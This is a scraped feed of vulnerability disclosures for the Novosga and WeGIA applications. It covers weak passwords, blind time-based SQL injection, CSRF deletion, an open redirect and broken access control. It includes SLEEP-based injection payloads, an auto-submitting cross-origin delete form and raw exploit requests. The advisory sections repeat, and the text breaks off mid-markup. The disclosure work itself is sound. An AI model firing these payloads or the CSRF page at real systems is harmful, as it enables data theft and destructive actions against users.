Policy Vulnerability in Create new User Function </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-11322" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-11322</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Weak Password Policy vulnerability was identified in the user registration functionality of the Novosga application. This vulnerability allows the creation of accounts with extremely weak and predictable passwords, such as <code>123456</code>. This exposes the platform to brute-force and credential stuffing attacks.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application fails to enforce a strong password policy. As a result, users can register accounts with trivial and well-known weak passwords, compromising the authentication security of the platform..</p><h2 id="cve-2025-11322-weak-password-policy-vulnerability-in-create-new-user-function">CVE-2025-11322: Weak Password Policy Vulnerability in Create new User Function </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-11322" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-11322</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Weak Password Policy vulnerability was identified in the user registration functionality of the Novosga application. This vulnerability allows the creation of accounts with extremely weak and predictable passwords, such as <code>123456</code>. This exposes the platform to brute-force and credential stuffing attacks.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application fails to enforce a strong password policy. As a result, users can register accounts with trivial and well-known weak passwords, compromising the authentication security of the platform..</p> <p>Vulnerable Component: <code>User registration / password creation</code></p> <h3 id="poc">PoC </h3><p style="text-align: justify;"> <ul> <li>Navigate to the user registration page after logged in with the Administrator account.</li> <li>Create a new user account with the password <code>123456</code>.</li> <li>The application accepts the weak password without restrictions and creates the account successfully.</li> </ul> </p> <p><img src="/p/cve-2025-11322/image.png" width="942" height="739" srcset="/p/cve-2025-11322/image_hu_5efc7146b11f1523.png 480w, /p/cve-2025-11322/image_hu_ad16b066d772cdf2.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="127" data-flex-basis="305px" /></p> <p><img src="/p/cve-2025-11322/image-1.png" width="939" height="784" srcset="/p/cve-2025-11322/image-1_hu_6250a21d35ef1c30.png 480w, /p/cve-2025-11322/image-1_hu_2a40994e5a3ad755.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="119" data-flex-basis="287px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Increased risk of brute-force and credential stuffing attacks.</li> <li>Unauthorized access to user or administrative accounts.</li> <li>Privilege escalation through compromised accounts.</li> <li>Reduced overall security posture of the application.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/NovoSga/CVE-2025-11322.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/NovoSga/CVE-2025-11322.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Mon, 06 Oct 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-61603/ https://www.cvehunters.com/p/cve-2025-61603/ <h2 id="cve-2025-61603-sql-injection-blind-time-based-vulnerability-in-id_pet-parameter-on-petprofile_petphp-endpoint">CVE-2025-61603: SQL Injection (Blind Time-Based) Vulnerability in <code>id_pet</code> Parameter on <code>/pet/profile_pet.php</code> Endpoint </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-61603" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-61603</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was discovered in the <code>id_pet</code> parameter of the <code>/pet/profile_pet.php</code> endpoint. This issue allows any attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application fails to properly sanitize user-supplied input in the <code>id_pet</code> parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.</p><h2 id="cve-2025-61603-sql-injection-blind-time-based-vulnerability-in-id_pet-parameter-on-petprofile_petphp-endpoint">CVE-2025-61603: SQL Injection (Blind Time-Based) Vulnerability in <code>id_pet</code> Parameter on <code>/pet/profile_pet.php</code> Endpoint </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-61603" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-61603</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was discovered in the <code>id_pet</code> parameter of the <code>/pet/profile_pet.php</code> endpoint. This issue allows any attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application fails to properly sanitize user-supplied input in the <code>id_pet</code> parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.</p> <h2 id="poc">PoC </h2><p>Vulnerable Endpoint: <code>/pet/profile_pet.php</code></p> <p>Parameter: <code>id_pet</code></p> <h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">+AND+SLEEP(10) </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-61603/image.png" width="1531" height="708" srcset="/p/cve-2025-61603/image_hu_d3891178922f3b57.png 480w, /p/cve-2025-61603/image_hu_9215cc27c0e46de.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="216" data-flex-basis="518px" /></p> <p style="text-align: justify;">Observe the time delay in the server response, indicating the successful execution of the SQL payload.</p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Unauthorized access to sensitive data (e.g., users, passwords, logs).</li> <li>Database enumeration (schemas, tables, users, versions).</li> <li>Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).</li> <li>Full compromise of the application if chained with other vulnerabilities.</li> <li>This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-8963-9833-gpx7" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-8963-9833-gpx7</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Thu, 02 Oct 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-61604/ https://www.cvehunters.com/p/cve-2025-61604/ <h2 id="cve-2025-61604-cross-site-request-forgery-csrf-vulnerability-in-almoxarifadocontrole-class-delete-get-on-controlphp-endpoint">CVE-2025-61604: Cross-Site Request Forgery (CSRF) Vulnerability in <code>AlmoxarifadoControle</code> class Delete (GET) on <code>control.php</code> Endpoint </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-61604" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-61604</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Cross-Site Request Forgery (CSRF) vulnerability was identified in the WeGIA application. The delete operation for the <code>Almoxarifado</code> entity is exposed via <code>HTTP GET</code> without CSRF protection, allowing a third-party site to trigger the action using the victim’s authenticated session.</p> <h2 id="poc">PoC </h2><p>Vulnerable Endpoint: <code>GET /WeGIA/controle/control.php</code></p> <p>Parameters: <code>metodo</code>, <code>nomeClasse</code> e <code>id_almoxarifado</code></p><h2 id="cve-2025-61604-cross-site-request-forgery-csrf-vulnerability-in-almoxarifadocontrole-class-delete-get-on-controlphp-endpoint">CVE-2025-61604: Cross-Site Request Forgery (CSRF) Vulnerability in <code>AlmoxarifadoControle</code> class Delete (GET) on <code>control.php</code> Endpoint </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-61604" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-61604</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Cross-Site Request Forgery (CSRF) vulnerability was identified in the WeGIA application. The delete operation for the <code>Almoxarifado</code> entity is exposed via <code>HTTP GET</code> without CSRF protection, allowing a third-party site to trigger the action using the victim’s authenticated session.</p> <h2 id="poc">PoC </h2><p>Vulnerable Endpoint: <code>GET /WeGIA/controle/control.php</code></p> <p>Parameters: <code>metodo</code>, <code>nomeClasse</code> e <code>id_almoxarifado</code></p> <p><img src="/p/cve-2025-61604/image.png" width="1498" height="644" srcset="/p/cve-2025-61604/image_hu_f5b0e3c8457f44d8.png 480w, /p/cve-2025-61604/image_hu_a02351acbaeffe3e.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="232" data-flex-basis="558px" /></p> <p><img src="/p/cve-2025-61604/image-1.png" width="775" height="456" srcset="/p/cve-2025-61604/image-1_hu_fe77fb317ebe37c3.png 480w, /p/cve-2025-61604/image-1_hu_443e426826577324.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="169" data-flex-basis="407px" /></p> <p><strong>Top-Level Navigation (works even with SameSite=Lax)</strong></p> <p>Host the file below from a different origin and open it while logged into WeGIA (ex: <code>poc_csrf_get.html</code>):</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"><span class="cp"><!doctype html></span> </span></span><span class="line"><span class="cl"><span class="p"><</span><span class="nt">html</span><span class="p">></span> </span></span><span class="line"><span class="cl"> <span class="p"><</span><span class="nt">body</span><span class="p">></span> </span></span><span class="line"><span class="cl"> <span class="p"><</span><span class="nt">form</span> <span class="na">id</span><span class="o">=</span><span class="s">"f"</span> <span class="na">method</span><span class="o">=</span><span class="s">"GET"</span> <span class="na">action</span><span class="o">=</span><span class="s">"https://sec.wegia.org:8000/WeGIA/controle/control.php"</span> <span class="na">target</span><span class="o">=</span><span class="s">"_self"</span><span class="p">></span> </span></span><span class="line"><span class="cl"> <span class="p"><</span><span class="nt">input</span> <span class="na">type</span><span class="o">=</span><span class="s">"hidden"</span> <span class="na">name</span><span class="o">=</span><span class="s">"metodo"</span> <span class="na">value</span><span class="o">=</span><span class="s">"excluir"</span><span class="p">></span> </span></span><span class="line"><span class="cl"> <span class="p"><</span><span class="nt">input</span> <span class="na">type</span><span class="o">=</span><span class="s">"hidden"</span> <span class="na">name</span><span class="o">=</span><span class="s">"nomeClasse"</span> <span class="na">value</span><span class="o">=</span><span class="s">"AlmoxarifadoControle"</span><span class="p">></span> </span></span><span class="line"><span class="cl"> <span class="p"><</span><span class="nt">input</span> <span class="na">type</span><span class="o">=</span><span class="s">"hidden"</span> <span class="na">name</span><span class="o">=</span><span class="s">"id_almoxarifado"</span> <span class="na">value</span><span class="o">=</span><span class="s">"{choose a ID}"</span><span class="p">></span> </span></span><span class="line"><span class="cl"> <span class="p"></</span><span class="nt">form</span><span class="p">></span> </span></span><span class="line"><span class="cl"> <span class="p"><</span><span class="nt">script</span><span class="p">></span><span class="nb">document</span><span class="p">.</span><span class="nx">getElementById</span><span class="p">(</span><span class="s1">'f'</span><span class="p">).</span><span class="nx">submit</span><span class="p">();</</span><span class="nt">script</span><span class="p">></span> </span></span><span class="line"><span class="cl"> <span class="p"></</span><span class="nt">body</span><span class="p">></span> </span></span><span class="line"><span class="cl"><span class="p"></</span><span class="nt">html</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="steps-to-reproduce">Steps to Reproduce: </h2><p style="text-align: justify;"> <ul> <li>Sign in to WeGIA with a user allowed to delete <code>Almoxarifado</code>.</li> <li>From another origin (e.g., <code>http://127.0.0.1:8008</code>), open the PoC HTML above.</li> <li>Observe WeGIA executing the delete flow (e.g., FK error or normal delete), proving a cross-site request can trigger the action.</li> </ul> </p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Integrity compromise: Attackers can induce privileged users to perform destructive actions by visiting an attacker-controlled page.</li> <li>Potential data loss or operational disruption if IDs not protected by FK constraints are targeted.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-59hm-4m9h-ch3m" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-59hm-4m9h-ch3m</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Thu, 02 Oct 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-61605/ https://www.cvehunters.com/p/cve-2025-61605/ <h2 id="cve-2025-61605-sql-injection-blind-time-based-vulnerability-in-descricao-parameter-on-controlecontrolphp-endpoint">CVE-2025-61605: SQL Injection (Blind Time-Based) Vulnerability in <code>descricao</code> Parameter on <code>/controle/control.php</code> Endpoint </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-61605" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-61605</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was discovered in the <code>descricao</code> parameter of the <code>/controle/control.php</code> endpoint. This issue allows any attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application fails to properly sanitize user-supplied input in the <code>descricao</code> parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.</p><h2 id="cve-2025-61605-sql-injection-blind-time-based-vulnerability-in-descricao-parameter-on-controlecontrolphp-endpoint">CVE-2025-61605: SQL Injection (Blind Time-Based) Vulnerability in <code>descricao</code> Parameter on <code>/controle/control.php</code> Endpoint </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-61605" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-61605</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was discovered in the <code>descricao</code> parameter of the <code>/controle/control.php</code> endpoint. This issue allows any attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application fails to properly sanitize user-supplied input in the <code>descricao</code> parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.</p> <h2 id="poc">PoC </h2><p>Vulnerable Endpoint: <code>/controle/control.php</code></p> <p>Parameter: <code>descricao</code></p> <h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">'%20AND%20SLEEP(5)%20AND%20'1'%3D'1'--%20- </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-61605/image.png" width="1530" height="710" srcset="/p/cve-2025-61605/image_hu_14dc839ca21520de.png 480w, /p/cve-2025-61605/image_hu_b816c8af74ba98e7.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="215" data-flex-basis="517px" /></p> <p style="text-align: justify;">Observe the time delay in the server response, indicating the successful execution of the SQL payload.</p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Unauthorized access to sensitive data (e.g., users, passwords, logs).</li> <li>Database enumeration (schemas, tables, users, versions).</li> <li>Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).</li> <li>Full compromise of the application if chained with other vulnerabilities.</li> <li>This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-v8hm-pq8g-c7j4" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-v8hm-pq8g-c7j4</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Thu, 02 Oct 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-61606/ https://www.cvehunters.com/p/cve-2025-61606/ <h2 id="cve-2025-61606-open-redirect-vulnerability-in-controlphp-endpoint-nextpage-parameter">CVE-2025-61606: Open Redirect Vulnerability in <code>control.php</code> endpoint <code>nextPage</code> parameter </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-61606" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-61606</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">An Open Redirect vulnerability was identified in the <code>control.php</code> endpoint of the WeGIA application, specifically in the <code>nextPage</code> parameter (metodo=listarUm nomeClasse=FuncionarioControle).</br></br>This vulnerability allows attackers to redirect users to arbitrary external domains, enabling phishing campaigns, malicious payload distribution, or user credential theft.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application fails to validate and sanitize user input in the <code>nextPage</code> parameter.</br></br>As a result, attackers can craft malicious URLs that redirect users to external websites outside the trusted domain, undermining user trust and enabling social engineering attacks.</p><h2 id="cve-2025-61606-open-redirect-vulnerability-in-controlphp-endpoint-nextpage-parameter">CVE-2025-61606: Open Redirect Vulnerability in <code>control.php</code> endpoint <code>nextPage</code> parameter </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-61606" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-61606</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">An Open Redirect vulnerability was identified in the <code>control.php</code> endpoint of the WeGIA application, specifically in the <code>nextPage</code> parameter (metodo=listarUm nomeClasse=FuncionarioControle).</br></br>This vulnerability allows attackers to redirect users to arbitrary external domains, enabling phishing campaigns, malicious payload distribution, or user credential theft.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application fails to validate and sanitize user input in the <code>nextPage</code> parameter.</br></br>As a result, attackers can craft malicious URLs that redirect users to external websites outside the trusted domain, undermining user trust and enabling social engineering attacks.</p> <p>Vulnerable Endpoint: <code>GET metodo=listarUm&nomeClasse=FuncionarioControle&nextPage=https%3A%2F%2Fgoogle.com&id_funcionario=2</code></p> <p>Parameter: <code>nextPage</code></p> <h3 id="poc">PoC </h3><h4 id="request">Request: </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">GET /WeGIA/controle/control.php?metodo=listarUm&nomeClasse=FuncionarioControle&nextPage=https%3A%2F%2Fgoogle.com&id_funcionario=2 HTTP/1.1 </span></span><span class="line"><span class="cl">Host: sec.wegia.org:8000 </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 </span></span><span class="line"><span class="cl">Accept-Language: en-US,en;q=0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br, zstd </span></span><span class="line"><span class="cl">Referer: https://sec.wegia.org:8000/WeGIA/html/funcionario/informacao_funcionario.php </span></span><span class="line"><span class="cl">Cookie: {COOKIE} </span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: 1 </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: document </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: navigate </span></span><span class="line"><span class="cl">Sec-Fetch-Site: same-origin </span></span><span class="line"><span class="cl">Sec-Fetch-User: ?1 </span></span><span class="line"><span class="cl">Priority: u=0, i </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;">The server accepts the crafted request and successfully redirects the victim to <code>https://google.com</code> instead of restricting navigation to the application’s own domain.</p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Phishing: Attackers can trick users into visiting malicious sites that mimic legitimate ones.</li> <li>Credential theft: Fake login pages can capture user credentials.</li> <li>Malware distribution: Victims may be redirected to websites hosting malicious software.</li> <li>Reputation damage: Users may lose trust in the Wegia platform if abused in phishing campaigns.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-m64v-hm7q-33wr" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-m64v-hm7q-33wr</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Thu, 02 Oct 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-61665/ https://www.cvehunters.com/p/cve-2025-61665/ <h2 id="cve-2025-61665-broken-access-control-in-get_relatorios_sociosphp-endpoint">CVE-2025-61665: Broken Access Control in <code>get_relatorios_socios.php</code> Endpoint </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-61665" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-61665</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Broken Access Control vulnerability was identified in the <code>get_relatorios_socios.php</code> endpoint of the WeGIA application. This vulnerability allows unauthenticated attackers to directly access sensitive personal and financial information of members without requiring authentication or authorization.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>get_relatorios_socios.php</code></p> <p>Parameters: <code>tipo_socio</code>, <code>tipo_pessoa</code>, <code>operador</code>, <code>valor</code>, <code>tag</code>, <code>status</code></p> <h2 id="poc">PoC </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">GET /WeGIA/html/socio/sistema/get_relatorios_socios.php?tipo_socio=x&tipo_pessoa=x&operador=maior_q&valor=&tag=x&status=x HTTP/1.1 </span></span><span class="line"><span class="cl">Host: sec.wegia.org:8000 </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl">Accept: */* </span></span><span class="line"><span class="cl">Accept-Language: en-US,en;q=0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br, zstd </span></span><span class="line"><span class="cl">X-Requested-With: XMLHttpRequest </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Referer: https://sec.wegia.org:8000/WeGIA/html/socio/sistema/relatorios_socios.php </span></span><span class="line"><span class="cl">Cookie: _ga_F8DXBXLV8J=GS2.1.s1756605228$o47$g1$t1756611307$j47$l0$h0; _ga=GA1.1.424189364.1749063834 </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: empty </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: cors </span></span><span class="line"><span class="cl">Sec-Fetch-Site: same-origin </span></span><span class="line"><span class="cl">Priority: u=0 </span></span></code></pre></td></tr></table> </div> </div><h3 id="response-snippet">Response (snippet): </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">HTTP/1.1 200 OK </span></span><span class="line"><span class="cl">Date: Sun, 31 Aug 2025 20:00:43 GMT </span></span><span class="line"><span class="cl">Server: Apache/2.4.62 (Debian) </span></span><span class="line"><span class="cl">Vary: Accept-Encoding </span></span><span class="line"><span class="cl">Content-Length: 204 </span></span><span class="line"><span class="cl">Keep-Alive: timeout=5, max=100 </span></span><span class="line"><span class="cl">Connection: Keep-Alive </span></span><span class="line"><span class="cl">Content-Type: text/html; charset=UTF-8 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">[{ </span></span><span class="line"><span class="cl"> "nome": "Luis Barango", </span></span><span class="line"><span class="cl"> "telefone": "(71)98642-1278", </span></span><span class="line"><span class="cl"> "cpf": "649.659.320-56", </span></span><span class="line"><span class="cl"> "valor_periodo": "5000.00", </span></span><span class="line"><span class="cl"> "email": "teste@teste.com", </span></span><span class="line"><span class="cl"> "tipo": "F\u00edsica - Mensal - Boleto", </span></span><span class="line"><span class="cl"> "status": "Ativo", </span></span><span class="line"><span class="cl"> "tag": "Solicitante" </span></span><span class="line"><span class="cl">}] </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-61665/image.png" width="1534" height="431" srcset="/p/cve-2025-61665/image_hu_14ad2691788bd7c6.png 480w, /p/cve-2025-61665/image_hu_16f20d6fda007cbd.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="355" data-flex-basis="854px" ></p><h2 id="cve-2025-61665-broken-access-control-in-get_relatorios_sociosphp-endpoint">CVE-2025-61665: Broken Access Control in <code>get_relatorios_socios.php</code> Endpoint </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-61665" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-61665</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Broken Access Control vulnerability was identified in the <code>get_relatorios_socios.php</code> endpoint of the WeGIA application. This vulnerability allows unauthenticated attackers to directly access sensitive personal and financial information of members without requiring authentication or authorization.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>get_relatorios_socios.php</code></p> <p>Parameters: <code>tipo_socio</code>, <code>tipo_pessoa</code>, <code>operador</code>, <code>valor</code>, <code>tag</code>, <code>status</code></p> <h2 id="poc">PoC </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 